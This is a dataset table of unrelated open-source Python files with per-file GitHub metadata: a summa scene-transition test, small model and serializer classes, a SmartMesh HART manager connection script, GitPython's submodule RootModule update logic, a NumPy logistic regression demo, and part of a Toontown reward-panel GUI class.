text stringlengths 4 1.02M | meta dict |
|---|---|
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
# Autotest driver data, consumed by the test harness (not by this script):
# testinfo encodes the scripted interaction (screenshots/timing/quit);
# tags labels the feature under test.
testinfo = "s, t 0.5, s, t 1, s, t 1.5, s, t 2.1, s, q"
tags = "TurnOffTilesTransition"
import summa
from summa.director import director
from summa.actions import *
from summa.layer import *
from summa.scenes import *
from summa.sprite import *
import pyglet
from pyglet import gl
class BackgroundLayer(summa.layer.Layer):
    """Layer that renders a single static background image."""

    def __init__(self):
        super(BackgroundLayer, self).__init__()
        # Loaded once at construction; pyglet's resource loader handles caching.
        self.img = pyglet.resource.image('background_image.png')

    def draw(self):
        # Reset the color, apply this layer's transform, then blit at the origin.
        glColor4ub(255, 255, 255, 255)
        glPushMatrix()
        self.transform()
        self.img.blit(0, 0)
        glPopMatrix()
def main():
    """Build two scenes and run a TurnOffTilesTransition between them."""
    director.init(resizable=True)

    first_scene = summa.scene.Scene()
    second_scene = summa.scene.Scene()

    color_layer = ColorLayer(32, 32, 255, 255)
    color_layer.add(Sprite('grossini.png', (320, 240)))

    first_scene.add(BackgroundLayer(), z=0)
    second_scene.add(color_layer, z=0)

    director.run(TurnOffTilesTransition(first_scene, 2, second_scene))


if __name__ == '__main__':
    main()
| {
"content_hash": "f9a829fc1fde1dddb740c3ae25ac1792",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 65,
"avg_line_length": 24.77777777777778,
"alnum_prop": 0.6385650224215247,
"repo_name": "shackra/thomas-aquinas",
"id": "7c192775f130ac34802c91017d9f87c91496e4da",
"size": "1188",
"binary": false,
"copies": "1",
"ref": "refs/heads/stable-branch",
"path": "tests/test_transition_turnofftiles.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1245155"
}
],
"symlink_target": ""
} |
from enum import Enum


class FollowType(Enum):
    """Kind of entity being followed."""
    ORG = 1
    USER = 2


class Follow(object):
    """A followed entity (organisation or user) with its display data."""

    # Class-level defaults kept for backward compatibility with code that
    # may read them off the class; instances always shadow them in __init__.
    followType = None
    id = ""
    name = ""
    href = ""

    def __init__(self, followType, id, name, href):
        """Create a follow record.

        :param followType: a FollowType member (ORG or USER)
        :param id: identifier string of the followed entity
        :param name: display name
        :param href: link to the entity
        """
        # isinstance accepts any FollowType member; the original compared
        # type() against type(FollowType.ORG), which is equivalent but obscure.
        assert isinstance(followType, FollowType)
        self.followType = followType
        self.id = id
        self.name = name
        self.href = href

    def __str__(self):
        return "{name:%s,id:%s,href:%s,type:%s}" % (
            self.name, self.id, self.href, str(self.followType))

    # str and repr intentionally share one implementation (the original
    # duplicated the same body in both methods).
    __repr__ = __str__
| {
"content_hash": "c87b8159cfadb9707b55c66af334dede",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 104,
"avg_line_length": 25.2,
"alnum_prop": 0.5682539682539682,
"repo_name": "XJouYi/SinaWeibo",
"id": "e91e40108fe8e8a52c76003d223e35c6aa6f10b1",
"size": "672",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SinaWeibo/follow.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "16396"
}
],
"symlink_target": ""
} |
from rest_framework import serializers
from placements.models import Bed, Plant, Inventory_Placement, Row
class BedSerializer(serializers.ModelSerializer):
    """Serializes a Bed to its id and name."""
    class Meta:
        model = Bed
        fields = ('id', 'name')
class RowSerializer(serializers.ModelSerializer):
    """Serializes a Row together with its 'bed' relation and comments."""
    class Meta:
        model = Row
        fields = ('id', 'name', 'bed', 'comments')
class PlantSerializer(serializers.ModelSerializer):
    """Serializes a Plant's full set of descriptive cultivar fields."""
    class Meta:
        model = Plant
        # NOTE: 'foilage_type' matches the model's (misspelled) field name.
        fields = ('id', 'name', 'hybridizer', 'pod', 'pollen', 'bloom_size_inches',
                  'scape_height_inches', 'ploidy', 'foilage_type', 'bloom_habit',
                  'bud_count', 'branches', 'fragrant', 'description', 'comments')
class Inventory_PlacementSerializer(serializers.ModelSerializer):
    """Read-style serializer for a placement: embeds the full plant and bed
    representations via nested serializers instead of bare ids."""
    plant = PlantSerializer()
    bed = BedSerializer()
    class Meta:
        model = Inventory_Placement
        fields = ('id', 'plant', 'bed', 'row', 'space', 'comments')
class PlacementManipulateSerializer(serializers.ModelSerializer):
    """Same model and field list as Inventory_PlacementSerializer, but without
    the nested plant/bed overrides — presumably used for create/update where
    plain related ids are submitted (verify against the views)."""
    class Meta:
        model = Inventory_Placement
        fields = ('id', 'plant', 'bed', 'row', 'space', 'comments')
| {
"content_hash": "5a68391d331be18f91b4cd079c85d09d",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 83,
"avg_line_length": 30.675675675675677,
"alnum_prop": 0.6405286343612335,
"repo_name": "pgenho/PPPRO",
"id": "70d1ad80edb1e08ca028183ed1bade25b71a67c0",
"size": "1136",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "api/serializers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "91080"
},
{
"name": "HTML",
"bytes": "40874"
},
{
"name": "JavaScript",
"bytes": "160492"
},
{
"name": "Python",
"bytes": "20269"
}
],
"symlink_target": ""
} |
#============================ adjust path =====================================
import sys
import os
if __name__ == "__main__":
here = sys.path[0]
sys.path.insert(0, os.path.join(here, '..', '..'))
#============================ imports =========================================
from SmartMeshSDK.HartMgrConnector import HartMgrConnector
from SmartMeshSDK.ApiDefinition import ApiDefinition, \
HartMgrDefinition
from SmartMeshSDK.ApiException import CommandError, \
ConnectionError
#============================ main ============================================
print 'Simple Application which interacts with the HART manager - (c) Dust Networks'
print '\n\n================== Step 1. Connecting to the manager =============='
connect = raw_input('\nDo you want to connect to a manager XML API? [y/n] ')
if connect.strip()!='y':
raw_input('\nScript ended. Press Enter to exit.')
sys.exit()
print '\n=====\nCreating connector'
connector = HartMgrConnector.HartMgrConnector()
print 'done.'
hartHost = raw_input('\nEnter the Manager\'s ip address (Factory default is 192.168.99.100) ')
#hartHost = raw_input('\nEnter the Manager\'s ip address (leave blank for '+DEFAULT_HOST+') ')
if not hartHost:
hartHost = DEFAULT_HOST
hartPort = raw_input('\nEnter the Manager\'s port (It is normally 4445) ')
#hartPort = raw_input('\nEnter the Manager\'s port (leave blank for '+str(DEFAULT_PORT)+') ')
if hartPort:
hartPort = int(hartPort)
else:
hartPort = DEFAULT_PORT
print '\n=====\nConnecting to Hart manager'
try:
connector.connect({
'host': hartHost,
'port': hartPort,
'user': 'admin',
'password': 'admin',
'use_ssl': False,
})
except ConnectionError as err:
print err
raw_input('\nScript ended. Press Enter to exit.')
sys.exit(1)
print 'done.'
keepgoing = raw_input('\nDo you want to keep going? [y/n] ')
if keepgoing.strip()!='y':
raw_input('\nScript ended. Press Enter to exit.')
sys.exit()
###########
raw_input('\nScript ended. Press Enter to exit.')
| {
"content_hash": "30f980d628d47e9658db125c5dc6cbe0",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 94,
"avg_line_length": 33.125,
"alnum_prop": 0.5106918238993711,
"repo_name": "bubbalinear/smartmeshsdk",
"id": "5008c935d35a87f119763939b8b846c638b55222",
"size": "2404",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bin/Simple/SimpleHartMgr.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1918602"
}
],
"symlink_target": ""
} |
from .base import (
Submodule,
UpdateProgress
)
from .util import (
find_first_remote_branch
)
from git.exc import InvalidGitRepositoryError
import git
import logging
__all__ = ["RootModule", "RootUpdateProgress"]
log = logging.getLogger('git.objects.submodule.root')
log.addHandler(logging.NullHandler())
class RootUpdateProgress(UpdateProgress):
    """Utility class which adds more opcodes to the UpdateProgress"""
    # Four new op-code bits, allocated directly above the base class's range
    # so they never collide with UpdateProgress's own codes.
    REMOVE, PATHCHANGE, BRANCHCHANGE, URLCHANGE = [
        1 << x for x in range(UpdateProgress._num_op_codes, UpdateProgress._num_op_codes + 4)]
    _num_op_codes = UpdateProgress._num_op_codes + 4
    __slots__ = tuple()
# Module-level aliases so the op-codes can be referenced without the class
# prefix inside RootModule.update() below.
BEGIN = RootUpdateProgress.BEGIN
END = RootUpdateProgress.END
REMOVE = RootUpdateProgress.REMOVE
BRANCHCHANGE = RootUpdateProgress.BRANCHCHANGE
URLCHANGE = RootUpdateProgress.URLCHANGE
PATHCHANGE = RootUpdateProgress.PATHCHANGE
class RootModule(Submodule):
    """A (virtual) Root of all submodules in the given repository. It can be used
    to more easily traverse all submodules of the master repository"""
    __slots__ = tuple()
    # Name of the synthetic root entry; no real submodule may use this name.
    k_root_name = '__ROOT__'
    def __init__(self, repo):
        # repo, binsha, mode=None, path=None, name = None, parent_commit=None, url=None, ref=None)
        # The root is a fake submodule describing the repository itself:
        # null sha, empty path/url, parented at the current HEAD commit.
        super(RootModule, self).__init__(
            repo,
            binsha=self.NULL_BIN_SHA,
            mode=self.k_default_mode,
            path='',
            name=self.k_root_name,
            parent_commit=repo.head.commit,
            url='',
            branch_path=git.Head.to_full_path(self.k_head_default)
        )
    def _clear_cache(self):
        """May not do anything"""
        pass
    #{ Interface
    def update(self, previous_commit=None, recursive=True, force_remove=False, init=True,
               to_latest_revision=False, progress=None, dry_run=False, force_reset=False,
               keep_going=False):
        """Update the submodules of this repository to the current HEAD commit.
        This method behaves smartly by determining changes of the path of a submodules
        repository, next to changes to the to-be-checked-out commit or the branch to be
        checked out. This works if the submodules ID does not change.
        Additionally it will detect addition and removal of submodules, which will be handled
        gracefully.
        :param previous_commit: If set to a commit'ish, the commit we should use
            as the previous commit the HEAD pointed to before it was set to the commit it points to now.
            If None, it defaults to HEAD@{1} otherwise
        :param recursive: if True, the children of submodules will be updated as well
            using the same technique
        :param force_remove: If submodules have been deleted, they will be forcibly removed.
            Otherwise the update may fail if a submodule's repository cannot be deleted as
            changes have been made to it (see Submodule.update() for more information)
        :param init: If we encounter a new module which would need to be initialized, then do it.
        :param to_latest_revision: If True, instead of checking out the revision pointed to
            by this submodule's sha, the checked out tracking branch will be merged with the
            latest remote branch fetched from the repository's origin.
            Unless force_reset is specified, a local tracking branch will never be reset into its past, therefore
            the remote branch must be in the future for this to have an effect.
        :param force_reset: if True, submodules may checkout or reset their branch even if the repository has
            pending changes that would be overwritten, or if the local tracking branch is in the future of the
            remote tracking branch and would be reset into its past.
        :param progress: RootUpdateProgress instance or None if no progress should be sent
        :param dry_run: if True, operations will not actually be performed. Progress messages
            will change accordingly to indicate the WOULD DO state of the operation.
        :param keep_going: if True, we will ignore but log all errors, and keep going recursively.
            Unless dry_run is set as well, keep_going could cause subsequent/inherited errors you wouldn't see
            otherwise.
            In conjunction with dry_run, it can be useful to anticipate all errors when updating submodules
        :return: self"""
        if self.repo.bare:
            raise InvalidGitRepositoryError("Cannot update submodules in bare repositories")
        # END handle bare
        if progress is None:
            progress = RootUpdateProgress()
        # END assure progress is set
        prefix = ''
        if dry_run:
            prefix = 'DRY-RUN: '
        repo = self.repo
        try:
            # SETUP BASE COMMIT
            ###################
            cur_commit = repo.head.commit
            if previous_commit is None:
                try:
                    previous_commit = repo.commit(repo.head.log_entry(-1).oldhexsha)
                    if previous_commit.binsha == previous_commit.NULL_BIN_SHA:
                        raise IndexError
                    # END handle initial commit
                except IndexError:
                    # in new repositories, there is no previous commit
                    previous_commit = cur_commit
                # END exception handling
            else:
                previous_commit = repo.commit(previous_commit)  # obtain commit object
            # END handle previous commit
            # Submodule sets at the previous commit (psms) and now (sms).
            psms = self.list_items(repo, parent_commit=previous_commit)
            sms = self.list_items(repo)
            spsms = set(psms)
            ssms = set(sms)
            # HANDLE REMOVALS
            ###################
            # Submodules present before but gone now are removed.
            rrsm = (spsms - ssms)
            len_rrsm = len(rrsm)
            for i, rsm in enumerate(rrsm):
                op = REMOVE
                if i == 0:
                    op |= BEGIN
                # END handle begin
                # fake it into thinking its at the current commit to allow deletion
                # of previous module. Trigger the cache to be updated before that
                progress.update(op, i, len_rrsm, prefix + "Removing submodule %r at %s" % (rsm.name, rsm.abspath))
                rsm._parent_commit = repo.head.commit
                rsm.remove(configuration=False, module=True, force=force_remove, dry_run=dry_run)
                if i == len_rrsm - 1:
                    op |= END
                # END handle end
                progress.update(op, i, len_rrsm, prefix + "Done removing submodule %r" % rsm.name)
            # END for each removed submodule
            # HANDLE PATH RENAMES
            #####################
            # url changes + branch changes
            # Submodules present both before and now are checked for changes.
            csms = (spsms & ssms)
            len_csms = len(csms)
            for i, csm in enumerate(csms):
                psm = psms[csm.name]
                sm = sms[csm.name]
                # PATH CHANGES
                ##############
                if sm.path != psm.path and psm.module_exists():
                    progress.update(BEGIN | PATHCHANGE, i, len_csms, prefix +
                                    "Moving repository of submodule %r from %s to %s"
                                    % (sm.name, psm.abspath, sm.abspath))
                    # move the module to the new path
                    if not dry_run:
                        psm.move(sm.path, module=True, configuration=False)
                    # END handle dry_run
                    progress.update(
                        END | PATHCHANGE, i, len_csms, prefix + "Done moving repository of submodule %r" % sm.name)
                # END handle path changes
                if sm.module_exists():
                    # HANDLE URL CHANGE
                    ###################
                    if sm.url != psm.url:
                        # Add the new remote, remove the old one
                        # This way, if the url just changes, the commits will not
                        # have to be re-retrieved
                        nn = '__new_origin__'
                        smm = sm.module()
                        rmts = smm.remotes
                        # don't do anything if we already have the url we search in place
                        if len([r for r in rmts if r.url == sm.url]) == 0:
                            progress.update(BEGIN | URLCHANGE, i, len_csms, prefix +
                                            "Changing url of submodule %r from %s to %s" % (sm.name, psm.url, sm.url))
                            if not dry_run:
                                assert nn not in [r.name for r in rmts]
                                smr = smm.create_remote(nn, sm.url)
                                smr.fetch(progress=progress)
                                # If we have a tracking branch, it should be available
                                # in the new remote as well.
                                if len([r for r in smr.refs if r.remote_head == sm.branch_name]) == 0:
                                    raise ValueError(
                                        "Submodule branch named %r was not available in new submodule remote at %r"
                                        % (sm.branch_name, sm.url)
                                    )
                                # END head is not detached
                                # now delete the changed one
                                rmt_for_deletion = None
                                for remote in rmts:
                                    if remote.url == psm.url:
                                        rmt_for_deletion = remote
                                        break
                                    # END if urls match
                                # END for each remote
                                # if we didn't find a matching remote, but have exactly one,
                                # we can safely use this one
                                if rmt_for_deletion is None:
                                    if len(rmts) == 1:
                                        rmt_for_deletion = rmts[0]
                                    else:
                                        # if we have not found any remote with the original url
                                        # we may not have a name. This is a special case,
                                        # and its okay to fail here
                                        # Alternatively we could just generate a unique name and leave all
                                        # existing ones in place
                                        raise InvalidGitRepositoryError(
                                            "Couldn't find original remote-repo at url %r" % psm.url)
                                    # END handle one single remote
                                # END handle check we found a remote
                                orig_name = rmt_for_deletion.name
                                smm.delete_remote(rmt_for_deletion)
                                # NOTE: Currently we leave tags from the deleted remotes
                                # as well as separate tracking branches in the possibly totally
                                # changed repository ( someone could have changed the url to
                                # another project ). At some point, one might want to clean
                                # it up, but the danger is high to remove stuff the user
                                # has added explicitly
                                # rename the new remote back to what it was
                                smr.rename(orig_name)
                                # early on, we verified that the our current tracking branch
                                # exists in the remote. Now we have to assure that the
                                # sha we point to is still contained in the new remote
                                # tracking branch.
                                smsha = sm.binsha
                                found = False
                                # NOTE(review): this indexes by the *root's* branch_name,
                                # while the availability check above used sm.branch_name --
                                # confirm this asymmetry is intended before changing it.
                                rref = smr.refs[self.branch_name]
                                for c in rref.commit.traverse():
                                    if c.binsha == smsha:
                                        found = True
                                        break
                                    # END traverse all commits in search for sha
                                # END for each commit
                                if not found:
                                    # adjust our internal binsha to use the one of the remote
                                    # this way, it will be checked out in the next step
                                    # This will change the submodule relative to us, so
                                    # the user will be able to commit the change easily
                                    log.warn("Current sha %s was not contained in the tracking\
                                    branch at the new remote, setting it the the remote's tracking branch", sm.hexsha)
                                    sm.binsha = rref.commit.binsha
                                # END reset binsha
                                # NOTE: All checkout is performed by the base implementation of update
                            # END handle dry_run
                            progress.update(
                                END | URLCHANGE, i, len_csms, prefix + "Done adjusting url of submodule %r" % (sm.name))
                        # END skip remote handling if new url already exists in module
                    # END handle url
                    # HANDLE PATH CHANGES
                    #####################
                    if sm.branch_path != psm.branch_path:
                        # finally, create a new tracking branch which tracks the
                        # new remote branch
                        progress.update(BEGIN | BRANCHCHANGE, i, len_csms, prefix +
                                        "Changing branch of submodule %r from %s to %s"
                                        % (sm.name, psm.branch_path, sm.branch_path))
                        if not dry_run:
                            smm = sm.module()
                            smmr = smm.remotes
                            # As the branch might not exist yet, we will have to fetch all remotes to be sure ... .
                            for remote in smmr:
                                remote.fetch(progress=progress)
                            # end for each remote
                            try:
                                tbr = git.Head.create(smm, sm.branch_name, logmsg='branch: Created from HEAD')
                            except OSError:
                                # ... or reuse the existing one
                                tbr = git.Head(smm, sm.branch_path)
                            # END assure tracking branch exists
                            tbr.set_tracking_branch(find_first_remote_branch(smmr, sm.branch_name))
                            # NOTE: All head-resetting is done in the base implementation of update
                            # but we will have to checkout the new branch here. As it still points to the currently
                            # checkout out commit, we don't do any harm.
                            # As we don't want to update working-tree or index, changing the ref is all there is to do
                            smm.head.reference = tbr
                        # END handle dry_run
                        progress.update(
                            END | BRANCHCHANGE, i, len_csms, prefix + "Done changing branch of submodule %r" % sm.name)
                    # END handle branch
                # END handle
            # END for each common submodule
        except Exception as err:
            # With keep_going, errors in the adjustment phase are logged and
            # swallowed so the per-submodule update below still runs.
            # NOTE(review): if the failure happened before 'sms' was assigned,
            # the loop below would raise NameError -- confirm acceptable.
            if not keep_going:
                raise
            log.error(str(err))
        # end handle keep_going
        # FINALLY UPDATE ALL ACTUAL SUBMODULES
        ######################################
        for sm in sms:
            # update the submodule using the default method
            sm.update(recursive=False, init=init, to_latest_revision=to_latest_revision,
                      progress=progress, dry_run=dry_run, force=force_reset, keep_going=keep_going)
            # update recursively depth first - question is which inconsitent
            # state will be better in case it fails somewhere. Defective branch
            # or defective depth. The RootSubmodule type will never process itself,
            # which was done in the previous expression
            if recursive:
                # the module would exist by now if we are not in dry_run mode
                if sm.module_exists():
                    type(self)(sm.module()).update(recursive=True, force_remove=force_remove,
                                                   init=init, to_latest_revision=to_latest_revision,
                                                   progress=progress, dry_run=dry_run, force_reset=force_reset,
                                                   keep_going=keep_going)
                # END handle dry_run
            # END handle recursive
        # END for each submodule to update
        return self
    def module(self):
        """:return: the actual repository containing the submodules"""
        return self.repo
    #} END interface
#} END classes
| {
"content_hash": "f135646ae83a8b90b362ad5dc07dfc54",
"timestamp": "",
"source": "github",
"line_count": 350,
"max_line_length": 120,
"avg_line_length": 50.47428571428571,
"alnum_prop": 0.5012453300124533,
"repo_name": "jeblair/GitPython",
"id": "fbd658d7c055f6857743cb98f990b138fdbf4334",
"size": "17666",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "git/objects/submodule/root.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "587"
},
{
"name": "Python",
"bytes": "801803"
},
{
"name": "Shell",
"bytes": "367"
}
],
"symlink_target": ""
} |
"""
Implementing logistic regression for classification problem
Helpful resources:
Coursera ML course
https://medium.com/@martinpella/logistic-regression-from-scratch-in-python-124c5636b8ac
"""
import numpy as np
from matplotlib import pyplot as plt
from sklearn import datasets
# get_ipython().run_line_magic('matplotlib', 'inline')
# In[67]:
def sigmoid_function(z):
    """Logistic (sigmoid) hypothesis function: 1 / (1 + e^-z).

    Maps any real-valued input (scalar or numpy array, elementwise)
    into the open interval (0, 1).
    """
    denominator = 1 + np.exp(-z)
    return 1 / denominator
def cost_function(h, y):
    """Mean binary cross-entropy between predictions h and labels y."""
    per_sample_loss = -y * np.log(h) - (1 - y) * np.log(1 - h)
    return per_sample_loss.mean()
def log_likelihood(X, Y, weights):
    """Bernoulli log-likelihood of labels Y under a linear-logit model."""
    logits = np.dot(X, weights)
    per_sample = Y * logits - np.log(1 + np.exp(logits))
    return np.sum(per_sample)
# here alpha is the learning rate, X is the feature matrix, y is the target matrix
def logistic_reg(alpha, X, y, max_iterations=70000):
    """Fit logistic-regression weights with batch gradient descent.

    :param alpha: learning rate (gradient step size)
    :param X: feature matrix, shape (n_samples, n_features)
    :param y: binary target vector, shape (n_samples,)
    :param max_iterations: number of gradient-descent steps
    :return: learned weight vector theta, shape (n_features,)
    """
    theta = np.zeros(X.shape[1])
    for iterations in range(max_iterations):
        z = np.dot(X, theta)
        h = sigmoid_function(z)
        gradient = np.dot(X.T, h - y) / y.size
        theta = theta - alpha * gradient  # updating the weights
        if iterations % 100 == 0:
            # Only evaluate the loss when it is actually printed; the original
            # recomputed z, h and J on every iteration just to print 1 in 100.
            # The printed values are unchanged.
            z = np.dot(X, theta)
            h = sigmoid_function(z)
            J = cost_function(h, y)
            print(f"loss: {J} \t")  # printing the loss after every 100 iterations
    return theta
# In[68]:
if __name__ == "__main__":
    # Two-feature, binary-label subset of the iris data set.
    iris = datasets.load_iris()
    features = iris.data[:, :2]
    labels = (iris.target != 0) * 1

    learning_rate = 0.1
    theta = logistic_reg(learning_rate, features, labels, max_iterations=70000)
    print("theta: ", theta)  # printing the theta i.e our weights vector

    def predict_prob(sample_matrix):
        # Probability of class 1 under the fitted model.
        return sigmoid_function(np.dot(sample_matrix, theta))

    # Scatter the two classes and overlay the p=0.5 decision boundary.
    plt.figure(figsize=(10, 6))
    plt.scatter(features[labels == 0][:, 0], features[labels == 0][:, 1], color="b", label="0")
    plt.scatter(features[labels == 1][:, 0], features[labels == 1][:, 1], color="r", label="1")
    x1_min, x1_max = features[:, 0].min(), features[:, 0].max()
    x2_min, x2_max = features[:, 1].min(), features[:, 1].max()
    xx1, xx2 = np.meshgrid(np.linspace(x1_min, x1_max), np.linspace(x2_min, x2_max))
    grid = np.c_[xx1.ravel(), xx2.ravel()]
    probs = predict_prob(grid).reshape(xx1.shape)
    plt.contour(xx1, xx2, probs, [0.5], linewidths=1, colors="black")
    plt.legend()
    plt.show()
| {
"content_hash": "9084bba43106ef90bb3982a17d07c306",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 87,
"avg_line_length": 30.68831168831169,
"alnum_prop": 0.6089716462124418,
"repo_name": "wuweilin/python",
"id": "48d88ef61185af0fe894bca3828ece4c06731a07",
"size": "2480",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "machine_learning/logistic_regression.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
import copy
from direct.directnotify import DirectNotifyGlobal
from direct.gui.DirectGui import *
from direct.interval.IntervalGlobal import *
import math
from pandac.PandaModules import *
import random
import Fanfare
from otp.otpbase import OTPGlobals
from toontown.coghq import CogDisguiseGlobals
from toontown.quest import Quests
from toontown.shtiker import DisguisePage
from toontown.suit import SuitDNA
from toontown.toonbase import TTLocalizer
from toontown.toonbase import ToontownBattleGlobals
from toontown.toonbase import ToontownGlobals
class RewardPanel(DirectFrame):
notify = DirectNotifyGlobal.directNotify.newCategory('RewardPanel')
SkipBattleMovieEvent = 'skip-battle-movie-event'
def __init__(self, name):
gscale = (TTLocalizer.RPdirectFrame[0], TTLocalizer.RPdirectFrame[1], TTLocalizer.RPdirectFrame[2] * 1.1)
DirectFrame.__init__(self, relief=None, geom=DGG.getDefaultDialogGeom(), geom_color=ToontownGlobals.GlobalDialogColor, geom_pos=Point3(0, 0, -.05), geom_scale=gscale, pos=(0, 0, 0.587))
self.initialiseoptions(RewardPanel)
self.avNameLabel = DirectLabel(parent=self, relief=None, pos=(0, 0, 0.3), text=name, text_scale=0.08)
self.gagExpFrame = DirectFrame(parent=self, relief=None, pos=(-0.32, 0, 0.24))
self.itemFrame = DirectFrame(parent=self, relief=None, text=TTLocalizer.RewardPanelItems, text_pos=(0, 0.2), text_scale=0.08)
self.cogPartFrame = DirectFrame(parent=self, relief=None, text=TTLocalizer.RewardPanelCogPart, text_pos=(0, 0.2), text_scale=0.08)
self.missedItemFrame = DirectFrame(parent=self, relief=None, text=TTLocalizer.RewardPanelMissedItems, text_pos=(0, 0.2), text_scale=0.08)
self.itemLabel = DirectLabel(parent=self.itemFrame, text='', text_scale=0.06)
self.cogPartLabel = DirectLabel(parent=self.cogPartFrame, text='', text_scale=0.06)
self.missedItemLabel = DirectLabel(parent=self.missedItemFrame, text='', text_scale=0.06)
self.questFrame = DirectFrame(parent=self, relief=None, text=TTLocalizer.RewardPanelToonTasks, text_pos=(0, 0.2), text_scale=0.06)
self.questLabelList = []
for i in xrange(ToontownGlobals.MaxQuestCarryLimit):
label = DirectLabel(parent=self.questFrame, relief=None, pos=(-0.85, 0, -0.1 * i), text=TTLocalizer.RewardPanelQuestLabel % i, text_scale=0.05, text_align=TextNode.ALeft)
label.hide()
self.questLabelList.append(label)
self.newGagFrame = DirectFrame(parent=self, relief=None, pos=(0, 0, 0.24), text='', text_wordwrap=14.4, text_pos=(0, -0.46), text_scale=0.06)
self.endTrackFrame = DirectFrame(parent=self, relief=None, pos=(0, 0, 0.24), text='', text_wordwrap=14.4, text_pos=(0, -0.46), text_scale=0.06)
self.congratsLeft = DirectLabel(parent=self.newGagFrame, pos=(-0.2, 0, -0.1), text='', text_pos=(0, 0), text_scale=0.06)
self.congratsLeft.setHpr(0, 0, -30)
self.congratsRight = DirectLabel(parent=self.newGagFrame, pos=(0.2, 0, -0.1), text='', text_pos=(0, 0), text_scale=0.06)
self.congratsRight.setHpr(0, 0, 30)
self.promotionFrame = DirectFrame(parent=self, relief=None, pos=(0, 0, 0.24), text='', text_wordwrap=14.4, text_pos=(0, -0.46), text_scale=0.06)
self.trackLabels = []
self.trackIncLabels = []
self.trackBars = []
self.trackBarsOffset = 0
self.meritLabels = []
self.meritIncLabels = []
self.meritBars = []
for i in xrange(len(SuitDNA.suitDepts)):
deptName = TextEncoder.upper(SuitDNA.suitDeptFullnames[SuitDNA.suitDepts[i]])
self.meritLabels.append(DirectLabel(parent=self.gagExpFrame, relief=None, text=deptName, text_scale=0.05, text_align=TextNode.ARight, pos=(TTLocalizer.RPmeritLabelPosX, 0, -0.09 * i - 0.125), text_pos=(0, -0.02)))
self.meritIncLabels.append(DirectLabel(parent=self.gagExpFrame, relief=None, text='', text_scale=0.05, text_align=TextNode.ALeft, pos=(0.7, 0, -0.09 * i - 0.125), text_pos=(0, -0.02)))
self.meritBars.append(DirectWaitBar(parent=self.gagExpFrame, relief=DGG.SUNKEN, frameSize=(-1,
1,
-0.15,
0.15), borderWidth=(0.02, 0.02), scale=0.25, frameColor=(DisguisePage.DeptColors[i][0] * 0.7,
DisguisePage.DeptColors[i][1] * 0.7,
DisguisePage.DeptColors[i][2] * 0.7,
1), barColor=(DisguisePage.DeptColors[i][0],
DisguisePage.DeptColors[i][1],
DisguisePage.DeptColors[i][2],
1), text='0/0 ' + TTLocalizer.RewardPanelMeritBarLabels[i], text_scale=TTLocalizer.RPmeritBarLabels, text_fg=(0, 0, 0, 1), text_align=TextNode.ALeft, text_pos=(-0.96, -0.05), pos=(TTLocalizer.RPmeritBarsPosX, 0, -0.09 * i - 0.125)))
for i in xrange(len(ToontownBattleGlobals.Tracks)):
trackName = TextEncoder.upper(ToontownBattleGlobals.Tracks[i])
self.trackLabels.append(DirectLabel(parent=self.gagExpFrame, relief=None, text=trackName, text_scale=TTLocalizer.RPtrackLabels, text_align=TextNode.ARight, pos=(0.13, 0, -0.09 * i), text_pos=(0, -0.02)))
self.trackIncLabels.append(DirectLabel(parent=self.gagExpFrame, relief=None, text='', text_scale=0.05, text_align=TextNode.ALeft, pos=(0.65, 0, -0.09 * i), text_pos=(0, -0.02)))
self.trackBars.append(DirectWaitBar(parent=self.gagExpFrame, relief=DGG.SUNKEN, frameSize=(-1,
1,
-0.15,
0.15), borderWidth=(0.02, 0.02), scale=0.25, frameColor=(ToontownBattleGlobals.TrackColors[i][0] * 0.7,
ToontownBattleGlobals.TrackColors[i][1] * 0.7,
ToontownBattleGlobals.TrackColors[i][2] * 0.7,
1), barColor=(ToontownBattleGlobals.TrackColors[i][0],
ToontownBattleGlobals.TrackColors[i][1],
ToontownBattleGlobals.TrackColors[i][2],
1), text='0/0', text_scale=0.18, text_fg=(0, 0, 0, 1), text_align=TextNode.ACenter, text_pos=(0, -0.05), pos=(0.4, 0, -0.09 * i)))
self._battleGui = loader.loadModel('phase_3.5/models/gui/battle_gui')
self.skipButton = DirectButton(parent=self, relief=None, image=(self._battleGui.find('**/tt_t_gui_gen_skipSectionUp'),
self._battleGui.find('**/tt_t_gui_gen_skipSectionDown'),
self._battleGui.find('**/tt_t_gui_gen_skipSectionRollOver'),
self._battleGui.find('**/tt_t_gui_gen_skipSectionDisabled')), pos=(0.815, 0, -0.395), scale=(0.39, 1.0, 0.39), text=('',
TTLocalizer.RewardPanelSkip,
TTLocalizer.RewardPanelSkip,
''), text_scale=TTLocalizer.RPskipScale, text_fg=Vec4(1, 1, 1, 1), text_shadow=Vec4(0, 0, 0, 1), text_pos=TTLocalizer.RPskipPos, textMayChange=0, command=self._handleSkip)
return
def getNextExpValue(self, curSkill, trackIndex):
retVal = ToontownBattleGlobals.UberSkill
for amount in ToontownBattleGlobals.Levels[trackIndex]:
if curSkill < amount:
retVal = amount
return retVal
return retVal
def getNextExpValueUber(self, curSkill, trackIndex):
return ToontownBattleGlobals.UberSkill
def getNextMeritValue(self, curMerits, toon, dept):
totalMerits = CogDisguiseGlobals.getTotalMerits(toon, dept)
retVal = totalMerits
if curMerits > totalMerits:
retVal = amount
return retVal
def initItemFrame(self, toon):
self.endTrackFrame.hide()
self.gagExpFrame.hide()
self.newGagFrame.hide()
self.promotionFrame.hide()
self.questFrame.hide()
self.itemFrame.show()
self.cogPartFrame.hide()
